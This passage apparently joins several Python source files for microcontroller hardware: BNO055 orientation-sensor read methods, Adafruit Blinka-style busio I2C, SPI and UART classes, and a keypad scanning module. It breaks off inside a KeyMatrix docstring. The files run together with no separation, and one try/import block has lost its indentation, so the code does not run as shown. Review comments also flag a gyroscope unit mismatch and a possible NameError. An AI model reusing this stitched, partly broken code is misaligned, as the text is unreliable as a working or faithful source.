    sign_config = self._read_byte(BNO055_AXIS_MAP_SIGN_ADDR)
    return (
        map_config & 0x03,         # x remap
        (map_config >> 2) & 0x03,  # y remap
        (map_config >> 4) & 0x03,  # z remap
        (sign_config >> 2) & 0x01, # x sign
        (sign_config >> 1) & 0x01, # y sign
        sign_config & 0x01,        # z sign
    )
def set_axis_remap(self, x, y, z,
                   x_sign=AXIS_REMAP_POSITIVE, y_sign=AXIS_REMAP_POSITIVE,
                   z_sign=AXIS_REMAP_POSITIVE):
    """Set the axis remap for each axis.

    ``x``, ``y`` and ``z`` must be a unique combination of AXIS_REMAP_X,
    AXIS_REMAP_Y and AXIS_REMAP_Z (two axes cannot map to the same
    physical axis).  The sign parameters are AXIS_REMAP_POSITIVE or
    AXIS_REMAP_NEGATIVE and select normal or inverted readings.  See
    get_axis_remap and section 3.4 of the datasheet for axis orientation.
    """
    # Remapping is a configuration change.
    self._config_mode()
    # Pack the three 2-bit axis selections into AXIS_MAP_CONFIG.
    remap = ((z & 0x03) << 4) | ((y & 0x03) << 2) | (x & 0x03)
    self._write_byte(BNO055_AXIS_MAP_CONFIG_ADDR, remap)
    # Pack the three 1-bit signs into AXIS_MAP_SIGN.
    signs = ((x_sign & 0x01) << 2) | ((y_sign & 0x01) << 1) | (z_sign & 0x01)
    self._write_byte(BNO055_AXIS_MAP_SIGN_ADDR, signs)
    # Resume normal operation.
    self._operation_mode()
def _read_vector(self, address, count=3):
    """Read ``count`` little-endian signed 16-bit values starting at
    ``address`` and return them as a list of ints.
    """
    raw = self._read_bytes(address, count*2)
    values = []
    # Bytes arrive low byte first; pair them up and sign-extend.
    for lo, hi in zip(raw[0::2], raw[1::2]):
        word = ((hi << 8) | lo) & 0xFFFF
        values.append(word - 65536 if word > 32767 else word)
    return values
def read_euler(self):
    """Return the current absolute orientation as a tuple of
    ``(heading, roll, pitch)`` Euler angles in degrees.
    """
    # Raw register LSB values are divided by 16 to produce degrees.
    return tuple(raw / 16.0 for raw in self._read_vector(BNO055_EULER_H_LSB_ADDR))
def read_magnetometer(self):
    """Return the current magnetometer reading as a tuple of
    ``(x, y, z)`` values in micro-Teslas.
    """
    # Raw register LSB values are divided by 16 to produce micro-Teslas.
    return tuple(raw / 16.0 for raw in self._read_vector(BNO055_MAG_DATA_X_LSB_ADDR))
def read_gyroscope(self):
    """Return the current gyroscope (angular velocity) reading as a tuple of
    X, Y, Z values in degrees per second.
    """
    # NOTE(review): the docstring says degrees per second, but 900.0 is the
    # radians-per-second scale factor (the degrees-per-second scale is 16
    # LSB per dps per the datasheet).  Confirm which unit UNIT_SEL is
    # configured for -- docstring and divisor appear inconsistent.
    x, y, z = self._read_vector(BNO055_GYRO_DATA_X_LSB_ADDR)
    return (x/900.0, y/900.0, z/900.0)
def read_accelerometer(self):
    """Return the current accelerometer reading as a tuple of
    ``(x, y, z)`` values in meters/second^2.
    """
    # Raw register LSB values are divided by 100 to produce m/s^2.
    return tuple(raw / 100.0 for raw in self._read_vector(BNO055_ACCEL_DATA_X_LSB_ADDR))
def read_linear_acceleration(self):
    """Return the current linear acceleration (acceleration from movement,
    with the gravity component removed) as a tuple of ``(x, y, z)`` values
    in meters/second^2.
    """
    # Raw register LSB values are divided by 100 to produce m/s^2.
    return tuple(raw / 100.0 for raw in self._read_vector(BNO055_LINEAR_ACCEL_DATA_X_LSB_ADDR))
def read_gravity(self):
    """Return the current gravity acceleration reading as a tuple of
    ``(x, y, z)`` values in meters/second^2.
    """
    # Raw register LSB values are divided by 100 to produce m/s^2.
    return tuple(raw / 100.0 for raw in self._read_vector(BNO055_GRAVITY_DATA_X_LSB_ADDR))
def read_quaternion(self):
    """Return the current orientation as a tuple of ``(x, y, z, w)``
    quaternion components.
    """
    # The registers store W first; the return value is reordered X, Y, Z, W.
    w, x, y, z = self._read_vector(BNO055_QUATERNION_DATA_W_LSB_ADDR, 4)
    # Values are fixed-point Q14; see section 3.6.5.5 in the datasheet.
    scale = 1.0 / (1 << 14)
    return (x * scale, y * scale, z * scale, w * scale)
def read_temp(self):
    """Return the current temperature in Celsius."""
    # The temperature register holds a single signed byte.
    return self._read_signed_byte(BNO055_TEMP_ADDR)
try:
import threading
except ImportError:
threading = None
# pylint: disable=unused-import
import adafruit_platformdetect.constants.boards as ap_board
import adafruit_platformdetect.constants.chips as ap_chip
from adafruit_blinka import Enum, Lockable, agnostic
from adafruit_blinka.agnostic import board_id, detector
# pylint: disable=import-outside-toplevel,too-many-branches,too-many-statements
# pylint: disable=too-many-arguments,too-many-function-args,too-many-return-statements
class I2C(Lockable):
    """
    Busio I2C Class for CircuitPython Compatibility. Used
    for both MicroPython and Linux.

    Instances are usable as context managers; when the ``threading``
    module is available, ``with`` acquires a per-object re-entrant lock.
    """

    def __init__(self, scl, sda, frequency=100000):
        self.init(scl, sda, frequency)

    def init(self, scl, sda, frequency):
        """Initialization: pick and construct the platform-specific I2C
        implementation for the detected board/chip.
        """
        self.deinit()
        # Create the context-manager lock up front.  Previously it was only
        # created after the final MicroPython port scan, so every platform
        # branch below that returns early produced an object whose
        # __enter__ raised AttributeError on self._lock.
        if threading is not None:
            self._lock = threading.RLock()
        if detector.board.ftdi_ft232h:
            from adafruit_blinka.microcontroller.ftdi_mpsse.mpsse.i2c import I2C as _I2C

            self._i2c = _I2C(frequency=frequency)
            return
        if detector.board.binho_nova:
            from adafruit_blinka.microcontroller.nova.i2c import I2C as _I2C

            self._i2c = _I2C(frequency=frequency)
            return
        if detector.board.microchip_mcp2221:
            from adafruit_blinka.microcontroller.mcp2221.i2c import I2C as _I2C

            self._i2c = _I2C(frequency=frequency)
            return
        if detector.board.greatfet_one:
            from adafruit_blinka.microcontroller.nxp_lpc4330.i2c import I2C as _I2C

            self._i2c = _I2C(frequency=frequency)
            return
        if detector.board.pico_u2if:
            from adafruit_blinka.microcontroller.rp2040_u2if.i2c import I2C_Pico as _I2C

            self._i2c = _I2C(scl, sda, frequency=frequency)
            return
        if detector.board.feather_u2if:
            from adafruit_blinka.microcontroller.rp2040_u2if.i2c import (
                I2C_Feather as _I2C,
            )

            self._i2c = _I2C(scl, sda, frequency=frequency)
            return
        if detector.board.feather_can_u2if:
            from adafruit_blinka.microcontroller.rp2040_u2if.i2c import (
                I2C_Feather_CAN as _I2C,
            )

            self._i2c = _I2C(scl, sda, frequency=frequency)
            return
        if detector.board.feather_epd_u2if:
            from adafruit_blinka.microcontroller.rp2040_u2if.i2c import (
                I2C_Feather_EPD as _I2C,
            )

            self._i2c = _I2C(scl, sda, frequency=frequency)
            return
        if detector.board.feather_rfm_u2if:
            from adafruit_blinka.microcontroller.rp2040_u2if.i2c import (
                I2C_Feather_RFM as _I2C,
            )

            self._i2c = _I2C(scl, sda, frequency=frequency)
            return
        if detector.board.qtpy_u2if:
            from adafruit_blinka.microcontroller.rp2040_u2if.i2c import I2C_QTPY as _I2C

            self._i2c = _I2C(scl, sda, frequency=frequency)
            return
        if detector.board.itsybitsy_u2if:
            from adafruit_blinka.microcontroller.rp2040_u2if.i2c import (
                I2C_ItsyBitsy as _I2C,
            )

            self._i2c = _I2C(scl, sda, frequency=frequency)
            return
        if detector.board.macropad_u2if:
            from adafruit_blinka.microcontroller.rp2040_u2if.i2c import (
                I2C_MacroPad as _I2C,
            )

            self._i2c = _I2C(scl, sda, frequency=frequency)
            return
        if detector.board.qt2040_trinkey_u2if:
            from adafruit_blinka.microcontroller.rp2040_u2if.i2c import (
                I2C_QT2040_Trinkey as _I2C,
            )

            self._i2c = _I2C(scl, sda, frequency=frequency)
            return
        if detector.board.kb2040_u2if:
            from adafruit_blinka.microcontroller.rp2040_u2if.i2c import (
                I2C_KB2040 as _I2C,
            )

            self._i2c = _I2C(scl, sda, frequency=frequency)
            return
        if detector.chip.id == ap_chip.RP2040:
            from adafruit_blinka.microcontroller.rp2040.i2c import I2C as _I2C

            self._i2c = _I2C(scl, sda, frequency=frequency)
            return
        if detector.board.any_siemens_iot2000:
            from adafruit_blinka.microcontroller.am65xx.i2c import I2C as _I2C

            self._i2c = _I2C(frequency=frequency)
            return
        # Fall-through platforms: select the implementation, then match the
        # requested pins against the board's known hardware I2C ports.
        if detector.board.any_embedded_linux:
            from adafruit_blinka.microcontroller.generic_linux.i2c import I2C as _I2C
        elif detector.board.ftdi_ft2232h:
            from adafruit_blinka.microcontroller.ftdi_mpsse.mpsse.i2c import I2C as _I2C
        else:
            from adafruit_blinka.microcontroller.generic_micropython.i2c import (
                I2C as _I2C,
            )
        from microcontroller.pin import i2cPorts

        for portId, portScl, portSda in i2cPorts:
            try:
                # pylint: disable=unexpected-keyword-arg
                if scl == portScl and sda == portSda:
                    self._i2c = _I2C(portId, mode=_I2C.MASTER, baudrate=frequency)
                    break
                # pylint: enable=unexpected-keyword-arg
            except RuntimeError:
                # Port could not be opened; keep scanning the others.
                pass
        else:
            raise ValueError(
                "No Hardware I2C on (scl,sda)={}\nValid I2C ports: {}".format(
                    (scl, sda), i2cPorts
                )
            )

    def deinit(self):
        """Deinitialization: release the underlying I2C implementation."""
        try:
            del self._i2c
        except AttributeError:
            # Never initialized (or already deinitialized) -- nothing to do.
            pass

    def __enter__(self):
        if threading is not None:
            self._lock.acquire()
        return self

    def __exit__(self, exc_type, exc_value, traceback):
        if threading is not None:
            self._lock.release()
        self.deinit()

    def scan(self):
        """Scan for attached devices; returns a list of responding addresses."""
        return self._i2c.scan()

    def readfrom_into(self, address, buffer, *, start=0, end=None):
        """Read from a device at specified address into a buffer"""
        if start != 0 or end is not None:
            if end is None:
                end = len(buffer)
            # Zero-copy view of the requested slice.
            buffer = memoryview(buffer)[start:end]
        stop = True  # remove for efficiency later
        return self._i2c.readfrom_into(address, buffer, stop=stop)

    def writeto(self, address, buffer, *, start=0, end=None, stop=True):
        """Write to a device at specified address from a buffer"""
        if isinstance(buffer, str):
            buffer = bytes([ord(x) for x in buffer])
        if start != 0 or end is not None:
            if end is None:
                return self._i2c.writeto(address, memoryview(buffer)[start:], stop=stop)
            return self._i2c.writeto(address, memoryview(buffer)[start:end], stop=stop)
        return self._i2c.writeto(address, buffer, stop=stop)

    def writeto_then_readfrom(
        self,
        address,
        buffer_out,
        buffer_in,
        *,
        out_start=0,
        out_end=None,
        in_start=0,
        in_end=None,
        stop=False,
    ):
        """Write to a device at specified address from a buffer then read
        from a device at specified address into a buffer
        """
        return self._i2c.writeto_then_readfrom(
            address,
            buffer_out,
            buffer_in,
            out_start=out_start,
            out_end=out_end,
            in_start=in_start,
            in_end=in_end,
            stop=stop,
        )
class SPI(Lockable):
    """
    Busio SPI Class for CircuitPython Compatibility. Used
    for both MicroPython and Linux.
    """

    def __init__(self, clock, MOSI=None, MISO=None):
        # Each branch below picks the platform-specific SPI implementation.
        # Most bridge/u2if boards only need the clock pin and derive
        # MOSI/MISO from it internally.
        self.deinit()
        if detector.board.ftdi_ft232h:
            from adafruit_blinka.microcontroller.ftdi_mpsse.mpsse.spi import SPI as _SPI

            # Note: these imports rebind the MOSI/MISO parameter names to
            # the FT232H board pins.
            from adafruit_blinka.microcontroller.ftdi_mpsse.ft232h.pin import (
                SCK,
                MOSI,
                MISO,
            )

            self._spi = _SPI()
            self._pins = (SCK, MOSI, MISO)
            return
        if detector.board.binho_nova:
            from adafruit_blinka.microcontroller.nova.spi import SPI as _SPI
            from adafruit_blinka.microcontroller.nova.pin import SCK, MOSI, MISO

            self._spi = _SPI(clock)
            self._pins = (SCK, MOSI, MISO)
            return
        if detector.board.greatfet_one:
            from adafruit_blinka.microcontroller.nxp_lpc4330.spi import SPI as _SPI
            from adafruit_blinka.microcontroller.nxp_lpc4330.pin import SCK, MOSI, MISO

            self._spi = _SPI()
            self._pins = (SCK, MOSI, MISO)
            return
        if detector.board.pico_u2if:
            from adafruit_blinka.microcontroller.rp2040_u2if.spi import SPI_Pico as _SPI

            self._spi = _SPI(clock)  # this is really all that's needed
            self._pins = (clock, clock, clock)  # will determine MOSI/MISO from clock
            return
        if detector.board.feather_u2if:
            from adafruit_blinka.microcontroller.rp2040_u2if.spi import (
                SPI_Feather as _SPI,
            )

            self._spi = _SPI(clock)  # this is really all that's needed
            self._pins = (clock, clock, clock)  # will determine MOSI/MISO from clock
            return
        if detector.board.feather_can_u2if:
            from adafruit_blinka.microcontroller.rp2040_u2if.spi import (
                SPI_Feather_CAN as _SPI,
            )

            self._spi = _SPI(clock)  # this is really all that's needed
            self._pins = (clock, clock, clock)  # will determine MOSI/MISO from clock
            return
        if detector.board.feather_epd_u2if:
            from adafruit_blinka.microcontroller.rp2040_u2if.spi import (
                SPI_Feather_EPD as _SPI,
            )

            self._spi = _SPI(clock)  # this is really all that's needed
            self._pins = (clock, clock, clock)  # will determine MOSI/MISO from clock
            return
        if detector.board.feather_rfm_u2if:
            from adafruit_blinka.microcontroller.rp2040_u2if.spi import (
                SPI_Feather_RFM as _SPI,
            )

            self._spi = _SPI(clock)  # this is really all that's needed
            self._pins = (clock, clock, clock)  # will determine MOSI/MISO from clock
            return
        if detector.board.itsybitsy_u2if:
            from adafruit_blinka.microcontroller.rp2040_u2if.spi import (
                SPI_ItsyBitsy as _SPI,
            )

            self._spi = _SPI(clock)  # this is really all that's needed
            self._pins = (clock, clock, clock)  # will determine MOSI/MISO from clock
            return
        if detector.board.macropad_u2if:
            from adafruit_blinka.microcontroller.rp2040_u2if.spi import (
                SPI_MacroPad as _SPI,
            )

            self._spi = _SPI(clock)  # this is really all that's needed
            self._pins = (clock, clock, clock)  # will determine MOSI/MISO from clock
            return
        if detector.board.qtpy_u2if:
            from adafruit_blinka.microcontroller.rp2040_u2if.spi import SPI_QTPY as _SPI

            self._spi = _SPI(clock)  # this is really all that's needed
            self._pins = (clock, clock, clock)  # will determine MOSI/MISO from clock
            return
        if detector.board.kb2040_u2if:
            from adafruit_blinka.microcontroller.rp2040_u2if.spi import (
                SPI_KB2040 as _SPI,
            )

            self._spi = _SPI(clock)  # this is really all that's needed
            self._pins = (clock, clock, clock)  # will determine MOSI/MISO from clock
            return
        if detector.chip.id == ap_chip.RP2040:
            from adafruit_blinka.microcontroller.rp2040.spi import SPI as _SPI

            self._spi = _SPI(clock, MOSI, MISO)  # Pins configured on instantiation
            self._pins = (clock, clock, clock)  # These don't matter, they're discarded
            return
        if detector.board.any_siemens_iot2000:
            from adafruit_blinka.microcontroller.am65xx.spi import SPI as _SPI

            self._spi = _SPI(clock)  # this is really all that's needed
            self._pins = (clock, clock, clock)  # will determine MOSI/MISO from clock
            return
        # Fall-through platforms: select the implementation, then match the
        # requested pins against the board's known hardware SPI ports.
        if detector.board.any_embedded_linux:
            from adafruit_blinka.microcontroller.generic_linux.spi import SPI as _SPI
        elif detector.board.ftdi_ft2232h:
            from adafruit_blinka.microcontroller.ftdi_mpsse.mpsse.spi import SPI as _SPI
        else:
            from adafruit_blinka.microcontroller.generic_micropython.spi import (
                SPI as _SPI,
            )
        from microcontroller.pin import spiPorts

        for portId, portSck, portMosi, portMiso in spiPorts:
            if (
                (clock == portSck)
                and MOSI in (portMosi, None)  # Clock is required!
                and MISO in (portMiso, None)  # But can do with just output
            ):  # Or just input
                self._spi = _SPI(portId)
                self._pins = (portSck, portMosi, portMiso)
                break
        else:
            raise ValueError(
                "No Hardware SPI on (SCLK, MOSI, MISO)={}\nValid SPI ports:{}".format(
                    (clock, MOSI, MISO), spiPorts
                )
            )

    def configure(self, baudrate=100000, polarity=0, phase=0, bits=8):
        """Update the configuration"""
        # Re-resolve the platform implementation so _SPI.MSB below refers to
        # the same class the constructor selected.
        if detector.board.any_nanopi and detector.chip.id == ap_chip.SUN8I:
            from adafruit_blinka.microcontroller.generic_linux.spi import SPI as _SPI
        elif detector.board.ftdi_ft232h:
            from adafruit_blinka.microcontroller.ftdi_mpsse.mpsse.spi import (
                SPI as _SPI,
            )
        elif detector.board.ftdi_ft2232h:
            from adafruit_blinka.microcontroller.ftdi_mpsse.mpsse.spi import (
                SPI as _SPI,
            )
        elif detector.board.binho_nova:
            from adafruit_blinka.microcontroller.nova.spi import SPI as _SPI
        elif detector.board.greatfet_one:
            from adafruit_blinka.microcontroller.nxp_lpc4330.spi import SPI as _SPI
        elif detector.board.any_lubancat and detector.chip.id == ap_chip.IMX6ULL:
            from adafruit_blinka.microcontroller.generic_linux.spi import SPI as _SPI
        elif detector.board.pico_u2if:
            from adafruit_blinka.microcontroller.rp2040_u2if.spi import SPI_Pico as _SPI
        elif detector.board.feather_u2if:
            from adafruit_blinka.microcontroller.rp2040_u2if.spi import (
                SPI_Feather as _SPI,
            )
        elif detector.board.feather_can_u2if:
            from adafruit_blinka.microcontroller.rp2040_u2if.spi import (
                SPI_Feather_CAN as _SPI,
            )
        elif detector.board.feather_epd_u2if:
            from adafruit_blinka.microcontroller.rp2040_u2if.spi import (
                SPI_Feather_EPD as _SPI,
            )
        elif detector.board.feather_rfm_u2if:
            from adafruit_blinka.microcontroller.rp2040_u2if.spi import (
                SPI_Feather_RFM as _SPI,
            )
        elif detector.board.itsybitsy_u2if:
            from adafruit_blinka.microcontroller.rp2040_u2if.spi import (
                SPI_ItsyBitsy as _SPI,
            )
        elif detector.board.macropad_u2if:
            from adafruit_blinka.microcontroller.rp2040_u2if.spi import (
                SPI_MacroPad as _SPI,
            )
        elif detector.board.kb2040_u2if:
            from adafruit_blinka.microcontroller.rp2040_u2if.spi import (
                SPI_KB2040 as _SPI,
            )
        elif detector.board.qtpy_u2if:
            from adafruit_blinka.microcontroller.rp2040_u2if.spi import SPI_QTPY as _SPI
        elif detector.chip.id == ap_chip.RP2040:
            from adafruit_blinka.microcontroller.rp2040.spi import SPI as _SPI
        elif detector.board.any_siemens_iot2000:
            from adafruit_blinka.microcontroller.am65xx.spi import SPI as _SPI
            from adafruit_blinka.microcontroller.am65xx.pin import Pin
        elif detector.board.any_embedded_linux:
            from adafruit_blinka.microcontroller.generic_linux.spi import SPI as _SPI
        else:
            from adafruit_blinka.microcontroller.generic_micropython.spi import (
                SPI as _SPI,
            )
        # self._locked is managed by the Lockable base (try_lock/unlock).
        if self._locked:
            # TODO check if #init ignores MOSI=None rather than unsetting, to save _pinIds attribute
            self._spi.init(
                baudrate=baudrate,
                polarity=polarity,
                phase=phase,
                bits=bits,
                firstbit=_SPI.MSB,
            )
        else:
            raise RuntimeError("First call try_lock()")

    def deinit(self):
        """Deinitialization"""
        self._spi = None
        # NOTE(review): this clears `_pinIds`, but the constructor stores
        # the pin tuple in `_pins`, which therefore survives deinit --
        # confirm which attribute name is intended.
        self._pinIds = None

    @property
    def frequency(self):
        """Return the baud rate if implemented"""
        try:
            return self._spi.frequency
        except AttributeError as error:
            raise NotImplementedError(
                "Frequency attribute not implemented for this platform"
            ) from error

    def write(self, buf, start=0, end=None):
        """Write to the SPI device"""
        return self._spi.write(buf, start, end)

    def readinto(self, buf, start=0, end=None, write_value=0):
        """Read from the SPI device into a buffer"""
        return self._spi.readinto(buf, start, end, write_value=write_value)

    def write_readinto(
        self, buffer_out, buffer_in, out_start=0, out_end=None, in_start=0, in_end=None
    ):
        """Write to the SPI device and read from the SPI device into a buffer"""
        return self._spi.write_readinto(
            buffer_out, buffer_in, out_start, out_end, in_start, in_end
        )
class UART(Lockable):
    """
    Busio UART Class for CircuitPython Compatibility. Used
    for MicroPython and a few other non-Linux boards.
    """

    class Parity(Enum):
        """Parity Enumeration"""

        pass  # pylint: disable=unnecessary-pass

    # Sentinel instances used as the enumeration members.
    Parity.ODD = Parity()
    Parity.EVEN = Parity()

    def __init__(
        self,
        tx,
        rx,
        baudrate=9600,
        bits=8,
        parity=None,
        stop=1,
        timeout=1000,
        receiver_buffer_size=64,
        flow=None,
    ):
        # On Linux a /dev tty with pyserial is the supported path.
        if detector.board.any_embedded_linux:
            raise RuntimeError(
                "busio.UART not supported on this platform. Please use pyserial instead."
            )
        # Pick the platform-specific UART implementation.
        if detector.board.binho_nova:
            from adafruit_blinka.microcontroller.nova.uart import UART as _UART
        elif detector.board.greatfet_one:
            from adafruit_blinka.microcontroller.nxp_lpc4330.uart import UART as _UART
        elif detector.chip.id == ap_chip.RP2040:
            from adafruit_blinka.microcontroller.rp2040.uart import UART as _UART
        else:
            from machine import UART as _UART
            from microcontroller.pin import uartPorts

        self.baudrate = baudrate
        # Hardware flow control is not implemented on any supported board.
        if flow is not None:  # default 0
            raise NotImplementedError(
                "Parameter '{}' unsupported on {}".format("flow", agnostic.board_id)
            )

        # translate parity flag for Micropython (ODD -> 1, EVEN -> 0)
        if parity is UART.Parity.ODD:
            parity = 1
        elif parity is UART.Parity.EVEN:
            parity = 0
        elif parity is None:
            pass
        else:
            raise ValueError("Invalid parity")

        if detector.chip.id == ap_chip.RP2040:
            # RP2040 takes the tx/rx pins directly.
            self._uart = _UART(
                tx,
                rx,
                baudrate=baudrate,
                bits=bits,
                parity=parity,
                stop=stop,
            )
        else:
            # check tx and rx have hardware support
            # NOTE(review): uartPorts is only imported in the final `else`
            # branch above, yet this scan also runs when _UART came from
            # the binho_nova/greatfet_one branches -- that path looks like
            # a latent NameError; confirm how those boards reach here.
            for portId, portTx, portRx in uartPorts:
                if portTx == tx and portRx == rx:
                    self._uart = _UART(
                        portId,
                        baudrate,
                        bits=bits,
                        parity=parity,
                        stop=stop,
                        timeout=timeout,
                        read_buf_len=receiver_buffer_size,
                    )
                    break
            else:
                raise ValueError(
                    "No Hardware UART on (tx,rx)={}\nValid UART ports: {}".format(
                        (tx, rx), uartPorts
                    )
                )

    def deinit(self):
        """Deinitialization"""
        # Only the nova backend exposes an explicit deinit hook.
        if detector.board.binho_nova:
            self._uart.deinit()
        self._uart = None

    def read(self, nbytes=None):
        """Read from the UART"""
        return self._uart.read(nbytes)

    def readinto(self, buf, nbytes=None):
        """Read from the UART into a buffer"""
        return self._uart.readinto(buf, nbytes)

    def readline(self):
        """Read a line of characters up to a newline character from the UART"""
        return self._uart.readline()

    def write(self, buf):
        """Write to the UART from a buffer"""
        return self._uart.write(buf)
import time
import threading
from collections import deque
import digitalio
class Event:
    """A key transition event."""

    def __init__(self, key_number=0, pressed=True):
        """
        Create a key transition event, which reports a key-pressed or key-released transition.

        :param int key_number: the key number
        :param bool pressed: ``True`` if the key was pressed; ``False`` if it was released.
        """
        self._key_number = key_number
        self._pressed = pressed

    @property
    def key_number(self):
        """The key number."""
        return self._key_number

    @property
    def pressed(self):
        """
        ``True`` if the event represents a key down (pressed) transition.
        The opposite of `released`.
        """
        return self._pressed

    @property
    def released(self):
        """
        ``True`` if the event represents a key up (released) transition.
        The opposite of `pressed`.
        """
        return not self._pressed

    def __eq__(self, other):
        """
        Two `Event` objects are equal if their `key_number`
        and `pressed`/`released` values are equal.
        """
        # Returning NotImplemented (instead of letting the attribute access
        # raise AttributeError) lets comparison against a non-Event fall
        # back to identity, so ``event == "x"`` is False rather than a crash.
        if not isinstance(other, Event):
            return NotImplemented
        return self.key_number == other.key_number and self.pressed == other.pressed

    def __hash__(self):
        """Returns a hash for the `Event`, so it can be used in dictionaries, etc..

        Only `key_number` participates, which stays consistent with
        `__eq__`: equal events always share a key number.
        """
        return hash(self._key_number)

    def __repr__(self):
        """Return a textual representation of the object"""
        return "<Event: key_number {} {}>".format(
            self.key_number, "pressed" if self._pressed else "released"
        )
class _EventQueue:
    """
    A queue of `Event` objects, filled by a `keypad` scanner such as `Keys` or
    `KeyMatrix`.  You cannot create an instance of `_EventQueue` directly;
    each scanner creates one when it is constructed.
    """

    def __init__(self, max_events):
        # Bounded deque of pending events; overflow is tracked separately so
        # a full queue never silently drops the oldest entries.
        self._events = deque([], max_events)
        self._overflowed = False

    def get(self):
        """
        Return the next key transition event, or ``None`` if none are pending.

        The queue size is limited; see ``max_events`` in the constructor of a
        scanner such as `Keys` or `KeyMatrix`.  If a new event arrives when
        the queue is full, that event is discarded and `overflowed` is set.

        :return: the next queued key transition `Event`
        :rtype: Optional[Event]
        """
        return self._events.popleft() if self._events else None

    def get_into(self, event):
        """Store the next key transition event in the supplied ``event`` and
        return ``True``; if nothing is queued, leave ``event`` untouched and
        return ``False``.

        Unlike ``get()``, this method allocates no storage: an existing
        ``Event`` object is reused.

        :return: ``True`` if an event was available and stored, ``False`` if not.
        :rtype: bool
        """
        try:
            pending = self._events.popleft()
        except IndexError:
            return False
        # pylint: disable=protected-access
        event._key_number = pending._key_number
        event._pressed = pending._pressed
        # pylint: enable=protected-access
        return True

    def clear(self):
        """Clear any queued key transition events and reset `overflowed` to
        ``False``.
        """
        self._events.clear()
        self._overflowed = False

    def __bool__(self):
        """``True`` when at least one event is queued — a quick emptiness check."""
        return bool(self._events)

    def __len__(self):
        """Return the number of queued events. Used to implement ``len()``."""
        return len(self._events)

    @property
    def overflowed(self):
        """
        ``True`` if an event could not be queued because the queue was full.
        (read-only)  Reset to ``False`` by `clear()`.
        """
        return self._overflowed

    def keypad_eventqueue_record(self, key_number, current):
        """Record a new event, or mark an overflow when the queue is full."""
        if len(self._events) < self._events.maxlen:
            self._events.append(Event(key_number, current))
        else:
            self._overflowed = True
class _KeysBase:
    """Shared machinery for key scanners: owns the event queue and calls the
    supplied scanning function periodically on a background daemon thread."""

    def __init__(self, interval, max_events, scanning_function):
        """
        :param float interval: minimum seconds between scans (debounce period)
        :param int max_events: capacity of the event queue
        :param callable scanning_function: called once per scan pass
        """
        self._interval = interval
        self._last_scan = time.monotonic()
        self._events = _EventQueue(max_events)
        self._scanning_function = scanning_function
        # Flag checked by the scanning loop so deinit() can actually stop it.
        # Without it, joining a `while True` loop would block forever.
        self._running = True
        self._scan_thread = threading.Thread(target=self._scanning_loop, daemon=True)
        self._scan_thread.start()

    @property
    def events(self):
        """The EventQueue associated with this Keys object. (read-only)"""
        return self._events

    def deinit(self):
        """Stop scanning"""
        # Tell the loop to exit, then wait for the thread to finish its
        # current (at most one) iteration.
        self._running = False
        if self._scan_thread.is_alive():
            self._scan_thread.join()

    def __enter__(self):
        """No-op used by Context Managers."""
        return self

    def __exit__(self, exception_type, exception_value, traceback):
        """
        Automatically deinitializes when exiting a context. See
        :ref:`lifetime-and-contextmanagers` for more info.
        """
        self.deinit()

    def _scanning_loop(self):
        # Scan no more often than self._interval; sleep off any remaining time
        # since the previous scan before running the scanning function again.
        while self._running:
            remaining_delay = self._interval - (time.monotonic() - self._last_scan)
            if remaining_delay > 0:
                time.sleep(remaining_delay)
            self._last_scan = time.monotonic()
            self._scanning_function()
class Keys(_KeysBase):
    """Manage a set of independent keys."""

    def __init__(
        self, pins, *, value_when_pressed, pull=True, interval=0.02, max_events=64
    ):
        """
        Create a `Keys` object that will scan keys attached to the given sequence of pins.
        Each key is independent and attached to its own pin.
        An event queue is created when this object is created and is available in the
        `events` attribute.

        :param Sequence[microcontroller.Pin] pins: The pins attached to the keys.
            The key numbers correspond to indices into this sequence.
        :param bool value_when_pressed: ``True`` if the pin reads high when the key is pressed.
            ``False`` if the pin reads low (is grounded) when the key is pressed.
            All the pins must be connected in the same way.
        :param bool pull: ``True`` if an internal pull-up or pull-down should be
            enabled on each pin. A pull-up will be used if ``value_when_pressed`` is ``False``;
            a pull-down will be used if it is ``True``.
            If an external pull is already provided for all the pins, you can set
            ``pull`` to ``False``.
            However, enabling an internal pull when an external one is already present is not
            a problem; it simply uses slightly more current.
        :param float interval: Scan keys no more often than ``interval`` to allow for debouncing.
            ``interval`` is in float seconds. The default is 0.020 (20 msecs).
        :param int max_events: maximum size of the `events` queue:
            maximum number of key transition events that are saved.
            Must be >= 1.
            If a new event arrives when the queue is full, that event is
            discarded and ``events.overflowed`` is set.
        """
        self._digitalinouts = []
        for pin in pins:
            dio = digitalio.DigitalInOut(pin)
            if pull:
                # Pull opposite to the active level so an unpressed key
                # reliably reads as released.
                dio.pull = (
                    digitalio.Pull.DOWN if value_when_pressed else digitalio.Pull.UP
                )
            self._digitalinouts.append(dio)
        self._currently_pressed = [False] * len(pins)
        self._previously_pressed = [False] * len(pins)
        self._value_when_pressed = value_when_pressed
        super().__init__(interval, max_events, self._keypad_keys_scan)

    def deinit(self):
        """Stop scanning and release the pins."""
        super().deinit()
        for dio in self._digitalinouts:
            dio.deinit()

    def reset(self):
        """Reset the internal state of the scanner to assume that all keys are now released.
        Any key that is already pressed at the time of this call will therefore immediately cause
        a new key-pressed event to occur.
        """
        # Use two distinct lists. The previous chained assignment bound ONE
        # list object to both names, so every scan's previous/current
        # comparison saw identical values and no events were ever reported
        # after a reset().
        self._currently_pressed = [False] * self.key_count
        self._previously_pressed = [False] * self.key_count

    @property
    def key_count(self):
        """The number of keys that are being scanned. (read-only)"""
        return len(self._digitalinouts)

    def _keypad_keys_scan(self):
        # Runs on the scanner thread: diff each pin against its previous
        # state and queue an Event on any transition.
        for key_number, dio in enumerate(self._digitalinouts):
            self._previously_pressed[key_number] = self._currently_pressed[key_number]
            current = dio.value == self._value_when_pressed
            self._currently_pressed[key_number] = current
            if self._previously_pressed[key_number] != current:
                self._events.keypad_eventqueue_record(key_number, current)
class KeyMatrix(_KeysBase):
    """Manage a 2D matrix of keys with row and column pins."""

    # pylint: disable=too-many-arguments
    def __init__(
        self,
        row_pins,
        column_pins,
        columns_to_anodes=True,
        interval=0.02,
        max_events=64,
    ):
        """
        Create a `KeyMatrix` object that will scan the key matrix attached to the given row and
        column pins.
        There should not be any external pull-ups or pull-downs on the matrix:
        ``KeyMatrix`` enables internal pull-ups or pull-downs on the pins as necessary.

        The keys are numbered sequentially from zero. A key number can be computed
        by ``row * len(column_pins) + column``.

        An event queue is created when this object is created and is available in the `events`
        attribute.

        :param Sequence[microcontroller.Pin] row_pins: The pins attached to the rows.
        :param Sequence[microcontroller.Pin] column_pins: The pins attached to the columns.
        :param bool columns_to_anodes: Default ``True``.
            If the matrix uses diodes, the diode anodes are typically connected to the column pins,
